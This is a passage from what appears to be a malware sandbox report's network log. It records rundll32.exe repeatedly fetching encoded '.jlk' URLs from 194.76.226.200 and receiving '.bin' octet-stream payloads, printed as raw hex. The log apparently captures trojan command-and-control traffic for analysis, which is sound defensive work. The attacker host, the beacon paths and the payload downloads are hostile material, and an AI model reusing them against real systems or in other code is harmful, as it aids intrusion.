b9 e0 85 93 9e 82 3e cc a0 69 a9 d5 7e 1e c3 f2 3f 74 9c 1f 33 20 ec 8f 5a 4f bb 8f 8f e7 42 99 ac 96 ae b4 51 30 56 2f 40 53 32 2f 92 bf 80 4d e5 84 a4 7d bb 6d 96 8c e2 2f 32 c1 b2 a3 da dc 2f fc c6 e4 ea 5b 7c 88 44 b3 05 8f d6 94 0f 25 19 c3 c4 c4 0b 74 37 12 d5 4d ac 86 2b 00 39
              Data Ascii: XD-?i1oC H/z> 9\%G X!9})1e[6!<vtEFne3camt[/P[:x$PeiA5l6L9*jpT;+H\.;DWH@iyhepc&}UgIm8+e;jv.BBO{(,m'{Go>(hve=:rFW|1Q#]da4yN!8?ixijQ-YSorYYdL$Sn"xYS_ieJ$FI7`k)l;C[TE{0p.^UJEb}7YpY!=*-wZ*>eGe|':Jz$GfU(YnvH#z1ImcCMnG2+e>#a{ ZGiK+6K)$Uv!sW8umQBE'-xmCaQwfn8oSPOi[{"RXSrtZ1k,>-N"{1Z]0.R7\%|(rqO-U@gXc.7! 1FXA'-Hq2EzFy!@]A4>i~?t3 ZOBQ0V/@S2/M}m/2/[|D%t7M+9
              Jan 26, 2022 10:28:11.422935009 CET | 2175 | OUT | GET /drew/HzhM5fP5x43l7rSkYr8Y/jYk_2FxetzKCt9WlQ60/DHr3pyDc_2BukVZ7K3nBXi/MEA2Xn3fXlFfO/GgBWR09O/Z1DKEGLlegReZBua8Nnmy16/fhqdF_2Beg/hrDVYSGiYpSkF5kA7/KsGOnRLVKqBx/xsw07jdGhl6/opBuLWprNFNT7s/OVJpMrjpCjISLpLDnGaGt/ixsS7exYYQrwdM8F/_2FgW9_2FjtCahO/8Yp45dJrj8Sd2mVa6W/QapGna.jlk HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 194.76.226.200
              Jan 26, 2022 10:28:11.693049908 CET | 2591 | IN | HTTP/1.1 200 OK
              Server: nginx/1.18.0 (Ubuntu)
              Date: Wed, 26 Jan 2022 09:28:11 GMT
              Content-Type: application/octet-stream
              Content-Length: 1800
              Connection: keep-alive
              Pragma: public
              Accept-Ranges: bytes
              Expires: 0
              Cache-Control: must-revalidate, post-check=0, pre-check=0
              Content-Disposition: inline; filename="61f1142ba4ce6.bin"
              Data Raw: f7 46 fb 9e 69 b9 56 c0 85 b5 3c ae 3e aa 33 38 35 5a 64 d6 52 bc 42 12 16 86 d3 f7 ff 19 25 a1 c8 72 2b cd 25 8a 0f 08 f0 2e e4 61 ba 42 9d 9e ee 3c 23 65 bb 49 f2 14 21 9d 9f bb f8 74 45 7d af 3c 4f 96 e8 0c 62 35 ae 13 55 7f f4 5b 3e ec 33 8a 5f 02 aa 2c bb 78 58 74 91 ef b2 91 fc 07 b1 e7 58 01 16 72 83 2b 7e 5a 2e 22 8b 9a 65 0b d7 79 6e 0d e7 28 15 6a e8 b1 91 82 21 54 f1 42 d4 5c ed 5a 9c ad ca f0 37 09 c3 4d 66 b4 a8 3a bf 34 89 96 61 91 fe 08 92 fa 9f 07 60 20 f9 72 77 bb 00 7e de 0d c5 36 8a 15 d9 0b d3 65 62 da dc bf de 5f 75 31 c8 2c 19 59 bb a0 b5 1d cd 5a 5f a9 ef 87 62 5a b8 2f ac b2 11 ba 5a 0e 85 47 da bb e7 69 e5 5a c5 8c 7e 71 4d cc 84 0c ca 20 e6 fc ea e1 ae 33 29 98 ea 7b 38 ab f4 89 e3 49 13 e8 f4 12 e2 b3 55 2c 03 e7 b0 71 4f 4c c1 67 d4 2f 4e 58 7a 5c 7c c7 91 c9 1f fb a9 00 72 7d 9e aa ed 09 bb e1 ea 33 18 c0 d8 95 2f c5 62 25 0b 77 08 41 79 0e 45 9e d9 2b fe e2 ff e7 46 c5 3c 9c 66 88 d2 65 6f d2 88 5a d0 b6 ad 21 b8 01 78 29 d4 8a 06 b1 40 40 bf d5 3d f3 f2 e8 5a fd c5 52 a6 bc 72 a5 1d e9 fe ff 88 56 52 a7 51 8c 13 e5 cb c9 d4 8b 03 7f bb 74 fb ac d1 e1 00 d2 40 cc 15 62 fd 28 ae d8 34 fd 56 dd 6c 02 c9 38 19 2f ff df ce c5 7b 74 cc 44 3d 9c 38 ea 8d 3a 35 f4 c4 01 79 8e 45 d4 c5 dd 89 51 09 7b 3a eb c5 23 9a c6 b6 24 68 77 a9 fb b9 ae c7 ad ae 82 05 1d 78 53 91 a8 80 31 28 10 54 42 2d 2b 6d 56 81 77 61 22 86 c5 47 fa 9a 53 8d bd 63 91 d5 01 a2 1c 33 70 53 45 62 7e 67 68 c2 25 eb 66 32 05 09 0b 79 d2 23 03 03 d2 3a f3 73 e2 c6 5f a8 02 78 b2 d6 5a 2e 24 6e f7 81 5d c4 a4 f2 1e ac 17 c2 eb 88 10 41 7d 02 c7 f9 c0 47 f5 73 8f 0c 15 77 09 27 50 3f 4d fe 7e 88 cb 97 9f 1f 67 28 83 81 84 a1 4b cc 96 e8 d8 2d 77 d2 a0 35 fc 5c c9 39 b0 32 79 1a 79 fb 68 7b 42 34 f4 a9 bb bc 44 6d 8c 97 71 2c 08 c7 8b d8 96 27 1e ed 11 b0 15 a2 16 73 18 fa 7b 31 dc d6 47 5a 83 a7 86 a5 91 84 19 02 d8 99 1f dd 25 a2 3e ee 3a 57 9f 14 d7 0b 14 b4 c3 2e 0c 9c 1c 82 eb ef 3f 79 73 0a 6b c1 1f ff bd 61 83 96 43 15 24 7d 24 26 68 20 d0 0c 3a 
69 57 e7 84 4e 04 45 00 39 98 a6 0a 32 41 54 26 8d 78 f2 ab 3b 20 7c b5 42 eb 10 e5 6b 44 e5 f5 9a be d3 42 f8 16 75 bc 5c 2e e0 33 7b cd cd 80 de 28 00 da 8d 26 0e cd 12 fc df be f4 7e 62 e2 1f c9 41 c2 50 74 c5 ac 31 fe 87 d6 9a bf 2a 3b fb 54 1d 7c e4 24 56 54 21 51 52 66 d7 68 04 3e 8a 5e 97 4c fb 60 8d 6f 65 19 9a f8 b0 c4 e0 21 62 ae 1b 91 96 d0 e9 64 c9 94 39 68 9b bd ef 96 5f 8c 09 32 26 fd 16 ee f6 a3 da 2f e8 a6 e4 d5 3f 8b f0 32 ce cb bf 75 ae d3 3a 63 3b eb 80 90 73 e7 ec 24 40 94 f0 a9 2f b8 db d8 33 c3 16 a7 2f fe eb cf 3b 01 f2 b1 51 9b 60 07 8c 7b 63 93 44 26 8d b7 ef 24 46 1b 61 71 a9 6a eb 5b 7f 79 93 d7 d1 7e 0d ca f6 93 48 e2 b2 3b 0f 6f 05 94 5d 16 58 25 ef ea e5 ff 5b e9 01 84 71 a3 4b 17 20 2a 79 0f 12 7b 26 ff bd d7 56 cb 30 91 35 69 4b 0a b1 34 12 d6 cf d7 54 01 1a 9e f1 32 69 9c 1d 55 46 91 fb b5 55 b9 fc 09 6b c8 ae 5c 74 ed 69 bb fe 85 58 bc cd 3d 88 e1 f0 b3 4f cf 7b e6 41 a2 f0 7c 6f 76 01 1a 14 33 47 5c aa e1 b8 3d c9 81 d6 dc 23 8d 90 12 a3 b9 e1 ed 50 ab 0e 1b d9 f3 45
              Data Ascii: FiV<>385ZdRB%r+%.aB<#eI!tE}<Ob5U[>3_,xXtXr+~Z."eyn(j!TB\Z7Mf:4a` rw~6eb_u1,YZ_bZ/ZGiZ~qM 3){8IU,qOLg/NXz\|r}3/b%wAyE+F<feoZ!x)@@=ZRrVRQt@b(4Vl8/{tD=8:5yEQ{:#$hwxS1(TB-+mVwa"GSc3pSEb~gh%f2y#:s_xZ.$n]A}Gsw'P?M~g(K-w5\92yyh{B4Dmq,'s{1GZ%>:W.?yskaC$}$&h :iWNE92AT&x; |BkDBu\.3{(&~bAPt1*;T|$VT!QRfh>^L`oe!bd9h_2&/?2u:c;s$@/3/;Q`{cD&$Faqj[y~H;o]X%[qK *y{&V05iK4T2iUFUk\tiX=O{A|ov3G\=#PE


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              2 | 192.168.2.3 | 49754 | 194.76.226.200 | 80 | C:\Windows\SysWOW64\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 26, 2022 10:28:10.463294029 CET | 1110 | OUT | GET /drew/m0QZKcj4ankL3W/8FVzGu6iQpcBkrTN5v3eZ/A6WzaqZBs9gogbdq/m8YEYG_2B_2FLSM/NM7eY2w3b1aL2aX8An/zJ6Vy7aKV/77q51XwDss_2Bne92xk6/rrRqhSV7rhVbP2hjU6R/_2B0H8cg3MM0IyieU8GPC9/gTwDi0Qx4J0HW/gyC_2FqL/iUkABk5euk2dlDO3ecBxilL/xQJUPbO4iF/9AhmuI174lSXWne_2/Fo5eEhaaDB/xKb9szQ5MHJ/1.jlk HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 194.76.226.200
              Jan 26, 2022 10:28:10.738502026 CET | 1249 | IN | HTTP/1.1 200 OK
              Server: nginx/1.18.0 (Ubuntu)
              Date: Wed, 26 Jan 2022 09:28:10 GMT
              Content-Type: application/octet-stream
              Content-Length: 205974
              Connection: keep-alive
              Pragma: public
              Accept-Ranges: bytes
              Expires: 0
              Cache-Control: must-revalidate, post-check=0, pre-check=0
              Content-Disposition: inline; filename="61f1142aaf285.bin"
              Data Raw: 0b 34 4a a5 90 0e c7 6f 93 f0 c9 9c 13 02 b2 b5 cc 76 30 92 6d 0e 22 4f c9 58 34 d7 fe b5 ba b7 5a ab 0e a3 52 08 62 4c 78 fd 91 22 35 10 c2 d3 61 1c 83 02 81 d8 3b c6 4c 9f eb b4 93 cc 31 0c 68 76 c0 57 f4 7b a4 04 53 d7 14 5d 88 7d 03 7f 09 50 4e 57 7a 07 db 05 d1 c4 36 78 ca 9d 10 4e ac a5 10 d0 07 02 c5 07 66 1b 6c 2b 79 30 7f 1d 61 fa ac 7f 36 be 4a 04 de 90 63 1a 5b eb 1a 72 1b 4f 2b 13 db 9c e2 df ae bc dc b0 ca 11 68 65 0d 38 ae be 00 a2 bd de 57 9d 31 ab 78 b9 89 12 36 b3 5a b7 d9 1b df fc 64 47 88 e6 91 15 96 e3 4d b2 e6 5f d6 d8 58 8f 3a b2 67 59 28 e5 38 d6 f3 d4 ec c8 10 cb 0f 32 41 a7 2a d0 1f 18 bc 53 77 e0 20 7c d9 e5 cf 26 82 51 e7 3e 03 7e 6e fa 82 c6 5a 4f 55 0d 03 d4 ae bf c0 d0 28 38 d8 07 65 cf 62 68 a7 c1 c1 d1 04 9c 39 0e 98 08 1e 90 cd 54 de 73 d1 7d 48 94 0f e7 c3 6f 7a 6f 11 8f bb 47 84 66 c5 95 8c 15 cd ea 00 37 32 9a 90 18 45 54 38 b7 be e8 a1 cc 90 1b 98 f1 f7 5a 39 ed 58 2e 04 21 85 12 70 7e 32 24 af ae 9e fb f0 56 71 b6 4f 4b db 22 16 8a 68 b9 da ae 4c a4 5e 8a 77 c8 50 57 04 fc 36 4d c9 28 17 cc a9 81 22 5d 70 7d 9c 4d 02 d1 7b 80 bb 0b e2 ca 73 5a 01 64 06 8f 11 cb 55 51 80 c1 18 c1 c9 38 11 f1 13 d6 39 8d df 7c c4 5e 86 65 c8 35 0a 13 62 48 d7 63 b1 c8 c7 a1 4f f7 6d 06 b5 57 50 fd 27 7b e8 0c 6a 1e 71 3c 3d d8 b8 0e 92 d2 51 19 3e 30 75 20 1f f4 aa 5f a3 2e 32 8a 0d a5 9f 80 7f fd 5b 6a 34 7b 2f 49 f0 28 0b 2b 1b 91 d8 0c 02 6b 60 96 ca 7c 5b 3f f2 0e 4e e1 a6 3a 7d a3 b6 31 11 ca 38 ad 77 4f 69 88 5b d8 dc 1c 50 fc 43 23 dd 4f 28 ab 4b 83 97 d9 83 86 37 d4 35 ee de 1e ed 9f 4b dd 00 a3 72 52 c7 27 04 4d 81 eb e9 ec 96 aa f9 2e 3f 42 c9 06 71 55 3b ac 74 d6 c3 51 95 7c a9 88 a1 29 cd 87 8b 8d 91 80 c2 27 be 0a 9a 79 c4 71 2f 66 cd 0d 8f ea 0b 71 9c 31 65 9c b4 71 c7 83 db 73 ef 97 72 58 6b ec 28 a0 a2 3d 78 f2 60 48 bd de f7 4d 89 e4 48 56 c7 c7 33 40 4f cd 43 22 8e e4 4d 45 8d 73 df 8f 3b 90 ff 56 18 e1 52 36 d5 ad bd 2c e6 ab d4 98 46 02 74 39 79 e3 9d 17 d0 64 90 67 45 46 51 f1 67 82 66 1f 8c 5d 2f d4 
55 75 55 00 e1 f5 7d bc b1 1d dc e3 cb 0d 0f 1d 20 b2 78 4b 19 50 9b 9d 80 05 ad 82 b1 4a 3d a9 c6 8d db f6 d1 40 f3 1a 7f 08 ee 73 12 77 8d f0 26 11 a9 d2 b2 53 5f cd 10 a7 56 ee 93 fb 29 64 a4 0d 0c 5a b7 dd f2 4d d8 ac d3 2e 26 e7 8b 9b 7a b8 46 13 e9 c5 1c a2 84 04 46 b6 03 bc dc 61 89 60 bc 13 9e 91 fa d6 f3 ea 0d 74 f1 38 9b 17 fd 5a 50 d8 4f 55 d3 bd f2 87 17 1a 66 8d 83 19 72 7f 9a 6d 49 86 65 84 7a 01 74 85 b2 c3 1d 24 dd 41 ae c5 26 a2 88 c2 f8 ee 1f 8b 69 75 6d 97 da 41 2d 1c 40 fb 6c 84 ee 4e cc e2 be 87 77 6e 71 f8 6c c4 5c 80 74 ca 68 f2 43 f6 3b ab 9d e3 3a 5f d2 44 73 0e be 3b 81 44 26 a5 16 3f 25 ba af e4 df 06 9c 06 17 77 74 07 91 08 54 dd 3d 33 1d 89 0b 05 11 e2 e7 cc 35 63 3d 83 27 fc 18 6e 35 dc 0e 03 ac 48 0e c6 06 d7 2c fe 39 2e 2a a3 29 3c ed c6 e5 88 ea bc 33 77 d9 07 43 16 a8 a3 36 e1 64 5a 40 a3 c8 50 1f fc a8 1d dc 70 3f 8f 91 29 e5 46 82 3a 29 d0 07 c8 e2 80 2b f0 30 a3 39 18 0e b1 c8 d9 db 90 7d 26 dd 91 2f f6 8e 45 3e 1b 26 e1 6f 5b 1f 0b f1 b9 12 d0 62 7e 46 46 19
              Data Ascii: 4Jov0m"OX4ZRbLx"5a;L1hvW{S]}PNWz6xNfl+y0a6Jc[rO+he8W1x6ZdGM_X:gY(82A*Sw |&Q>~nZOU(8ebh9Ts}HozoGf72ET8Z9X.!p~2$VqOK"hL^wPW6M("]p}M{sZdUQ89|^e5bHcOmWP'{jq<=Q>0u _.2[j4{/I(+k`|[?N:}18wOi[PC#O(K75KrR'M.?BqU;tQ|)'yq/fq1eqsrXk(=x`HMHV3@OC"MEs;VR6,Ft9ydgEFQgf]/UuU} xKPJ=@sw&S_V)dZM.&zFFa`t8ZPOUfrmIezt$A&iumA-@lNwnql\thC;:_Ds;D&?%wtT=35c='n5H,9.*)<3wC6dZ@Pp?)F:)+09}&/E>&o[b~FF
              Jan 26, 2022 10:28:10.738564968 CET | 1250 | IN | Data Raw: 41 1e fe e1 f1 ae a3 57 10 dd a0 5a ca b8 50 30 d7 31 ea b4 01 7d c2 91 09 08 ce 9b d1 e6 ae 6c fd 9e da 16 2a 6a 80 64 7f 63 cb 76 b1 e5 70 b3 4b ee ae 74 a8 07 13 22 4b 4d e3 26 0a 0e bb b8 51 ea 8f 9e 44 a0 8d 09 23 0d 24 94 39 77 f8 a2 f1 be
              Data Ascii: AWZP01}l*jdcvpKt"KM&QD#$9w"rh=EMw Xxc0~QSmdo8-3eehDx9p1;xt0ccU_n9G~X$$Z~W/sQwI9R:(Ka>k
              Jan 26, 2022 10:28:10.738637924 CET | 1251 | IN | Data Raw: 0a ca f3 c8 64 af b7 9c 50 26 44 70 2c 49 ff fe 67 7c 2b 05 27 83 9d ca d1 41 18 02 0a 1a 69 be 8a 10 be 39 ff 50 5e cb 38 a1 51 e9 b8 25 c3 da 00 ce b2 d3 11 05 ff ac ef cd 0f 59 9b ac 6d e0 09 ff 46 68 14 b7 81 d5 da 21 d7 10 14 ba f5 d7 a3 71
              Data Ascii: dP&Dp,Ig|+'Ai9P^8Q%YmFh!q%KNZ6uFY-]_;D[V`>l0&}Lc{+%L9",~uGKU/N^lNw3b3HU/]0e:$A}D"KJ
              Jan 26, 2022 10:28:10.738676071 CET | 1253 | IN | Data Raw: ca 39 82 32 ae 72 18 43 1c dd fd 9b ed f6 51 8d ab c6 11 93 a3 20 6e 4b 45 a0 05 a1 80 3f 8d 61 0c 33 55 27 ba 6c 58 57 e5 a2 d4 6a f3 b3 69 e0 3e 0d bb 52 e4 78 c8 75 a6 a1 3c c3 1b 3b d0 ab c4 67 e2 1f 96 3e fb 45 87 8a a9 92 b9 41 ab 64 84 02
              Data Ascii: 92rCQ nKE?a3U'lXWji>Rxu<;g>EAda!i6MT%s9WBIRn<mywgVS*;N+0Ne"D+4`_8K7{g<T<FJ. 7H/=}
              Jan 26, 2022 10:28:10.738739014 CET | 1254 | IN | Data Raw: 2f da e6 93 1c a7 c9 16 59 cf 4e 4e ad 91 65 c2 8a da 4b be d1 0c bc de 95 69 0b 8a 07 73 b2 86 1d cf 52 a3 44 c3 a2 5d 4a 22 1c c1 7c 10 9d 26 f5 e4 e3 96 0f 93 73 85 b6 92 35 64 27 a7 d9 16 0d 58 c3 ff 09 4c c5 6f 63 9a ce 1a 10 a7 b6 d1 97 58
              Data Ascii: /YNNeKisRD]J"|&s5d'XLocX'|RQy4MoPg37L_>2dZ}5xNYg'uP]YgH8+6uwHZ@F,D]y]4-d5VpBmKK
              Jan 26, 2022 10:28:10.738778114 CET | 1256 | IN | Data Raw: 2b 1d da c2 1d 24 4b f5 b5 ea a5 b2 62 ea 22 a0 72 b6 c7 3a cd dd 7a a3 b2 48 b4 c1 0a 16 9b b3 2b b2 92 14 9d f2 6d 4b 94 43 6a 10 36 cf 56 b9 06 d7 99 90 a6 6d 24 a6 71 8b 1c 56 02 7c 48 0e 94 7c 42 8a 13 68 47 5f 9a 99 f1 fa 2a 72 3a 87 da 1c
              Data Ascii: +$Kb"r:zH+mKCj6Vm$qV|H|BhG_*r:!>QBE.}fS.%;$-<*@_yV1aio /{-0D<mzC.HRto.N,/UjV#|G=XHjpG>Kt<]B
              Jan 26, 2022 10:28:10.738832951 CET | 1256 | IN | Data Raw: 3a 5c 45 2a fe db 99 e8 c3 fe 61 44 7a e7 f7 ef 0c 17 e0 d7 65 eb e4 80 70 32 e8 72 16 e7 dd 93 ba b3 f2 d4 b3 1a 70 b9 04 67 92 ab 70 29 f5 4b 2b d9 ad 6d 6f f5 a9 5a 41 33 14 50 da f9 d4 2e 7b 4f 8e 4b 43 d8 b4 b6 22 42 53 b1 f2 70 6d c6 53 59
              Data Ascii: :\E*aDzep2rpgp)K+moZA3P.{OKC"BSpmSYfXo|u_vMGht\mu0QRNuegGi|r45!Z2EYoa5n)
              Jan 26, 2022 10:28:10.738871098 CET | 1257 | IN | Data Raw: 1f 46 dd 39 6a e7 ee f5 53 dc 9b 06 ac 90 d4 3b 67 ae 1b c1 52 b2 50 76 d3 e8 37 e1 a6 db 59 88 06 5a 11 85 02 ec 0d ea 01 33 81 bf e6 76 e2 96 d7 26 1d f3 32 ab 6c 59 68 42 c2 e1 f6 80 ba bc 63 e4 e6 31 d8 7a 89 b4 fa a7 59 58 62 d8 c3 4e fd d9
              Data Ascii: F9jS;gRPv7YZ3v&2lYhBc1zYXbNIbt]rDxY3-vmua{eiwcU3){_+r$1B|2iR?}_.B`T>1KR8K vvw%/yN+@|cxgR
              Jan 26, 2022 10:28:10.738909006 CET | 1259 | IN | Data Raw: 98 2c d9 b4 4e f3 68 58 f9 0e ab 80 69 3b ef 41 53 03 60 a4 6f 2d ca b3 91 be f8 e0 06 cc 2b 9c 3e 70 83 bb 26 bb db b3 f9 4d 08 88 74 1c e6 4f d7 36 2b 72 01 1e d8 a8 7d cc 2e 91 a2 b1 ba 25 8b 83 40 cf fe 89 83 9a 85 e6 ad 57 67 3e 26 a7 36 1d
              Data Ascii: ,NhXi;AS`o-+>p&MtO6+r}.%@Wg>&6`8~ZCs?O23d!,!w(E3AHNc+xYw!3't3-!Rs;~p)T9;yEu\A>;CR%2f=`A
              Jan 26, 2022 10:28:10.738971949 CET | 1260 | IN | Data Raw: c1 88 d1 4b d7 fa 8f 60 1a a7 4c fd 83 e2 de 6d 85 53 29 12 be f7 e5 8f 0f 90 6a 0b 0c 82 3f f7 5d 96 02 48 71 95 08 d4 66 07 a7 a6 a4 e6 f5 8f 84 21 7c 96 8f d6 c2 65 10 44 84 a6 d9 01 2d 90 3a 9d e2 8b 40 6e d9 c3 bb 1a 50 65 80 f1 e7 5f c0 3a
              Data Ascii: K`LmS)j?]Hqf!|eD-:@nPe_:42\)%uu{{d\{x<J/InJ<0%GWc(x8aHH:grs'w9Xf>C"+F/3"csi\gy4uJ!iZj[
              Jan 26, 2022 10:28:10.760608912 CET | 1385 | IN | Data Raw: 4e 21 85 2d 19 14 20 8f a4 df 90 16 75 d9 f0 db 92 b5 d1 99 25 b8 71 b8 e2 fb 02 95 4f 85 58 01 6b 41 c7 e0 22 cc 72 ea f2 cf 73 8c 2a 89 cb 20 26 2c cf 12 a2 8f 4a 58 5c 42 41 94 c1 af dd 3f b5 a7 a7 54 2b e7 54 b9 1c 3c 4c 42 5e 50 ee 5a 8d 04
              Data Ascii: N!- u%qOXkA"rs* &,JX\BA?T+T<LB^PZwk~x,GH'dlyndS\>znPtx]<`N__N2J<'$8J@"`Z30E:Z68IwQPc1ypYKq,4yZYY"D!s@Yu \rx5<{
              Jan 26, 2022 10:28:11.148814917 CET | 1761 | OUT | GET /drew/SzHdMdWvg/8JrkfhvX1ImoPdiWmQP6/QNbELOUZkV6PJ_2F_2B/T_2FBOZzzLom_2BccXK2f_/2B4napL_2F34z/ZunofQOB/e8FUQk93KOWF2nr5L7lasmZ/NJz0CTr65M/vqC70qv5uFkSE3WWV/uzLbKezipUQb/EiDVCVAB9rI/YTJRJOijIzHReN/lOWZ3chpUTxk47un6IsE8/fGRw3zIlPFEXwpmw/KXHYTQF2fkI3XOU/3s8f8mWLipjSZC2MeH/eanpmASqD48wQWqOn/qyD.jlk HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 194.76.226.200
              Jan 26, 2022 10:28:11.427643061 CET | 2181 | IN | HTTP/1.1 200 OK
              Server: nginx/1.18.0 (Ubuntu)
              Date: Wed, 26 Jan 2022 09:28:11 GMT
              Content-Type: application/octet-stream
              Content-Length: 262298
              Connection: keep-alive
              Pragma: public
              Accept-Ranges: bytes
              Expires: 0
              Cache-Control: must-revalidate, post-check=0, pre-check=0
              Content-Disposition: inline; filename="61f1142b64746.bin"
              Data Raw: bc 58 44 2d 3f 69 1c 31 6f 19 ce bd 43 f0 20 48 2f a8 05 9b 0e 7a 3e 20 f1 f5 39 03 5c ec 25 14 47 ca 20 58 0c 21 39 da 11 c2 cf 7d ea e9 bd e0 29 31 a9 65 5b 07 36 21 bc bd 3c 8d 80 a7 96 dd 76 86 90 74 45 b9 fa 0c 05 46 10 a3 e9 f0 9a 00 ca 11 6e 65 f9 dd 9d 9e 33 63 61 96 0d 7f bc 6d 8d a8 fa 74 5b 85 1f 03 07 2f 96 87 82 0b c0 50 5b e2 9b 0f 15 ef 3a 18 83 ed 78 e9 24 bd d5 50 65 eb d4 69 41 35 6c 8b 36 81 b0 b7 83 87 f2 99 9c dc 14 4c 1a 9e 39 2a 93 cb 6a 9f b7 da 70 12 ff f3 e9 54 c1 a0 da e7 c8 3b cd 2b 9e 48 f8 94 94 82 5c 2e 01 04 3b ba cd a4 44 0b d1 57 48 d1 40 8a 69 00 8a 79 dd 8d 7f 68 fe db 65 87 08 d5 9d 19 70 c1 d2 12 63 26 8d b8 8f eb e2 d4 f6 0c 7d bc 55 af 67 0e 49 6d 0e b0 bd d1 80 06 ea 38 2b 65 3b 8e 6a 76 d7 f7 89 2e 85 0a c9 be b2 8c 42 42 4f 7b 28 2c 6d 27 b9 7b cc 91 47 6f 1f 88 98 1e 3e d4 28 68 c2 c6 76 65 3d 09 3a a5 72 b4 46 f1 e0 d2 94 e7 57 7c e8 19 8c 31 83 ce 83 e7 97 ce 0d 51 ff c2 23 5d df 8e 64 07 b2 10 d9 cf 61 82 c5 34 79 bc fd f2 a6 c1 4e ef 21 d0 c9 a8 a5 ac 9c ad c4 94 e9 f2 fb a7 38 f6 f7 3f ce 80 69 78 cd 93 be d3 de a3 10 69 6a 51 2d 59 9a 13 e0 53 b1 6f 72 a4 e1 7f b3 90 b1 fc d9 aa 59 bc 59 97 82 64 99 0b ac a8 04 bd 04 4c b6 24 de 0d 53 fe 01 a3 13 6e d8 22 78 59 53 fe 95 18 0c 81 d7 5f 8a cd 05 69 1c 65 4a 9b 24 46 06 ac fb 49 9d de 37 60 ae ee c6 6b 29 02 6c 0e a1 3b e0 0e 43 a4 1b 5b 9b c0 e8 8d 54 45 de 9a d1 7b 85 30 17 70 2e 5e fa d1 ea 55 b7 09 4a 45 19 fd 62 7d d2 c2 37 e1 59 70 cb cb f0 59 12 f6 21 3d f8 f7 9e e0 e8 e5 02 1e 2a 2d a8 96 a4 77 f2 5a 2a ef d7 3e 65 47 a9 bb 0f ac db c5 65 7c 27 de b3 3a c9 4a 7a f7 24 47 cf f8 cd e4 d7 14 66 55 28 59 d9 9a d7 12 6e a0 84 de a0 76 b4 cc c5 48 c8 d7 da ed f3 f6 89 a3 23 08 7a d6 31 49 1b e9 e7 f5 6d ad ef 63 c9 09 43 4d d4 6e 47 18 ac 32 2b 65 3e 82 1d 23 61 ac 1b a2 06 be 9d 19 7b 20 df cf 5a 03 ac 9d 11 d3 47 69 f2 af ce 4b ad a1 ef 2b fc 8e 36 0b db d3 e8 4b cd 90 d7 c4 92 08 94 9b ae 29 f1 7f 1c f8 80 24 55 8b 13 76 d8 9f 21 95 73 57 
a8 e4 ad be 38 75 6d fc 51 42 da 45 01 ce be a8 8e bf 1c 27 2d 78 d4 11 a5 de 6d 95 43 00 61 1a 51 12 77 fa b9 66 a5 85 6e 81 9b e4 d6 d3 38 f2 eb 8f 6f 53 50 e7 b4 4f a0 f6 69 88 5b 7b c9 03 a4 02 a7 22 52 c6 cd ec d7 dd 58 53 72 01 a5 ea 13 88 ee ef 11 74 a2 bb a7 5a c3 df 31 00 6b ae a5 2c 3e 2d ae 96 ac 4e 83 f7 22 7b 95 a1 31 5a 5d cb ec cc 1a 30 9a c8 2e c3 ed d6 0e fe 52 10 aa d4 ef 89 c6 37 cf fa cd ec c6 8e 8b 1c 5c 25 7c fd 28 86 e8 72 01 b6 e2 94 96 0a 71 4f 83 2d 17 55 15 40 67 58 d8 63 b4 d1 ac 11 2e 37 21 1c 87 20 31 1f 0c 46 58 bb bd ac 41 e6 de 27 05 ca 9c 2d 48 d8 ef 9a e1 71 92 d6 32 99 0d 05 06 b5 45 8e 7a b5 1d b6 89 fa 46 1a e3 d4 79 21 b8 92 e5 c3 80 40 10 5d 85 c8 10 a5 41 c9 0e c6 a2 34 a1 fe b9 e0 85 93 9e 82 3e cc a0 69 a9 d5 7e 1e c3 f2 3f 74 9c 1f 33 20 ec 8f 5a 4f bb 8f 8f e7 42 99 ac 96 ae b4 51 30 56 2f 40 53 32 2f 92 bf 80 4d e5 84 a4 7d bb 6d 96 8c e2 2f 32 c1 b2 a3 da dc 2f fc c6 e4 ea 5b 7c 88 44 b3 05 8f d6 94 0f 25 19 c3 c4 c4 0b 74 37 12 d5 4d ac 86 2b 00 39
              Data Ascii: XD-?i1oC H/z> 9\%G X!9})1e[6!<vtEFne3camt[/P[:x$PeiA5l6L9*jpT;+H\.;DWH@iyhepc&}UgIm8+e;jv.BBO{(,m'{Go>(hve=:rFW|1Q#]da4yN!8?ixijQ-YSorYYdL$Sn"xYS_ieJ$FI7`k)l;C[TE{0p.^UJEb}7YpY!=*-wZ*>eGe|':Jz$GfU(YnvH#z1ImcCMnG2+e>#a{ ZGiK+6K)$Uv!sW8umQBE'-xmCaQwfn8oSPOi[{"RXSrtZ1k,>-N"{1Z]0.R7\%|(rqO-U@gXc.7! 1FXA'-Hq2EzFy!@]A4>i~?t3 ZOBQ0V/@S2/M}m/2/[|D%t7M+9
              Jan 26, 2022 10:28:11.894968987 CET | 2593 | OUT | GET /drew/S0hO4k1kNWmaIbAIKk6J/C6ltlnn67F9zU4319Wq/SHohWMCDfW7oiPhqwsiIKI/bmU8FVW7oRmBm/mR3BXgY_/2FBwUjw6HBJfko8dOlgJjVp/0AJ_2FHS_2/F6As3DqY8qnvNETrK/YeXgHXybA3MO/9wS_2FpxfKh/va60IJVV7f3myC/lkXy0Vd4C9gsuVelNEUUO/TZ36G6O4b_2Br5X5/Ty9Sl6i_2F9Ot_2/Fw5KU6KNbXI13KA_2B/fSlw9uxRZ/1GDQy2uvqr3Bg6MoNgQy/Xe_2F1.jlk HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 194.76.226.200
              Jan 26, 2022 10:28:12.168813944 CET | 2597 | IN | HTTP/1.1 200 OK
              Server: nginx/1.18.0 (Ubuntu)
              Date: Wed, 26 Jan 2022 09:28:12 GMT
              Content-Type: application/octet-stream
              Content-Length: 1800
              Connection: keep-alive
              Pragma: public
              Accept-Ranges: bytes
              Expires: 0
              Cache-Control: must-revalidate, post-check=0, pre-check=0
